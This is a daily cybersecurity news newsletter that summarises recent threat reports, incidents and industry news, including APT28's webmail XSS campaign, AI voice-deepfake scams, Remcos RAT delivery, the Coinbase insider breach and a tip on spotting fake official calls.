Cyber Briefing: 2025.05.16
APT28 hits webmail, AI voice scams surge, and Remcos RAT spreads via LNKs. Coinbase insider breach, Swiss plant phished, Brazil pharma hit. CISA renewal, $230M crypto bust, Proofpoint acquires Hornet.
Listen to our podcast here!
Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
First time seeing this?
👉 What are the latest cybersecurity alerts, incidents, and news?
🚨 Cyber Alerts
1. APT28 RoundPress Webmail Hack Steals Emails
Suspected Russian state-sponsored hackers, identified as APT28, are conducting a global cyberespionage campaign dubbed 'RoundPress'. This operation targets high-value government organizations across the globe by exploiting flaws in widely used webmail servers. Attackers initiate contact through spear-phishing emails containing malicious JavaScript, which allows them to steal credentials and data merely when an email is opened. The campaign has successfully leveraged multiple cross-site scripting (XSS) vulnerabilities, including zero-days, in webmail products such as Roundcube, MDaemon, and Zimbra.
2. FBI Warns of AI Voice Phishing Scams
The FBI has issued a warning that cybercriminals are now using AI-generated voice deepfakes in phishing campaigns targeting current and former U.S. government officials. These attacks, which began in April 2025, combine voice phishing (vishing) and text messaging (smishing) to impersonate senior officials and manipulate victims into revealing sensitive information or transferring funds. The agency urges the public to treat unsolicited messages from officials with skepticism, as the threat of AI-enhanced deception grows across multiple sectors.
3. Fileless Remcos RAT Delivery Via LNK Files
Researchers have detailed a new Remcos RAT campaign that uses PowerShell loaders and LNK files for fileless deployment. This remote access trojan enables full system control for espionage, operating stealthily in memory to avoid detection. Other threats include a new .NET malware loader and various phishing campaigns delivering info-stealers and RATs. The rise of AI-powered polymorphic attacks further complicates defense, bypassing traditional security measures effectively.
For more alerts, click here!
💥 Cyber Incidents
4. Coinbase Insider Attack Exposed User Data
Coinbase confirmed that unknown attackers bribed support agents to steal account data from a small group of users. The stolen information included names, masked bank details, government ID images, and transaction histories. Although no funds or passwords were directly exposed, the attackers attempted to extort $20 million by claiming they had internal company data. Coinbase has fired the compromised agents, reimbursed affected users, added stricter ID checks, and offered a $20 million reward for information that leads to the attackers’ arrest and conviction.
5. Hackers Target Swiss Reserve Power Plant
Hackers successfully accessed the email account of a manager at the Birr reserve power plant in Switzerland. They sent phishing emails to Swiss suppliers and business partners, attempting to trick recipients into clicking malicious links. Swiss authorities, including the Federal Office of Energy, confirmed the attack but stated the plant’s core systems remained secure. This incident highlights vulnerabilities in critical infrastructure, and new Swiss laws now require prompt reporting of such cyberattacks to improve national cybersecurity defenses.
6. Cyberattack Hits J Batista Group
Brazilian pharmaceutical firms Nazária and Drogarias Globo, part of Jorge Batista group, suffered a cyberattack. The attack caused system instabilities prompting them to reinforce security and work on service normalization. While details are limited and the parent group is silent a separate incident hit Brazil's IPEN. This earlier IPEN attack halted radiopharmaceutical production highlighting wider sector risks in Brazil.
For more incidents, click here!
📢 Cyber News
7. Lawmakers Urge Cyber Bill Renewal Soon
Lawmakers on the House Homeland Security Committee’s Cybersecurity Subcommittee are urging swift reauthorization of the Cybersecurity Information Sharing Act (CISA 2015), which is set to expire on September 30. The law has been key in enabling threat intelligence exchanges between government agencies and private industry, helping defend national security against cyber threats. While officials like DHS Secretary Kristi Noem support the renewal, some lawmakers express concern that privacy issues could stall progress, even though no violations have been reported since the law’s passage
8. US Charges 12 More in $230M Crypto Theft
US authorities charged twelve more suspects in a major RICO conspiracy involving over $230M in crypto theft. The group allegedly used spoofed numbers and impersonation to trick victims into revealing access credentials. Facing charges like racketeering and money laundering the defendants laundered funds through various crypto services. This stolen cryptocurrency was then used to finance extravagant lifestyles and luxury purchases by the group.
9. Proofpoint to Acquire Hornetsecurity
Proofpoint announced plans to acquire Hornetsecurity, a major Microsoft 365 security solutions provider. The deal strengthens Proofpoint’s global presence and supports its focus on small and mid-sized businesses. Hornetsecurity offers AI-powered cloud security and compliance services through over 12,000 partners worldwide. The acquisition, valued at $1 billion, is expected to close in the second half of 2025.
For more news, click here
📈Cyber Stocks
💡 Cyber Tip
Watch Out for Fake Voice Calls Claiming to Be from U.S. Officials
The FBI warns that cybercriminals are using AI-generated voice deepfakes and text messages to impersonate senior U.S. officials. These scams trick people into revealing sensitive info or sending money.
✅ What you should do:
Be skeptical of unexpected voice calls or texts from officials or executives, especially if they ask for urgent action.
Don’t click on links or share personal information unless you verify the sender through a trusted contact method.
If something feels off even if the voice sounds real, hang up and confirm through official channels.
Stay alert to smishing (fraudulent texts) and vishing (voice phishing) tactics that build trust before launching a scam.
Why this matters: AI deepfakes make scams sound more convincing than ever, and even high-level professionals are being targeted.
📚 Cyber Book
TCybersecurity for Seniors Made Easy: Simple Steps to Protect Your Identity, Avoid Money Scams, and Enjoy Peace of Mind Every Time You Go Online by Alex East, Sathammai Somasundaram, and Dr Pablo Breuer
That’s a wrap on today’s threats. Stay sharp, patch often, and see you again on Monday’s briefing.
Copyright © 2025 CyberMaterial. All Rights Reserved.
Follow CyberMaterial on:
Substack, LinkedIn, Twitter, Reddit, Instagram, Facebook, YouTube, and Medium.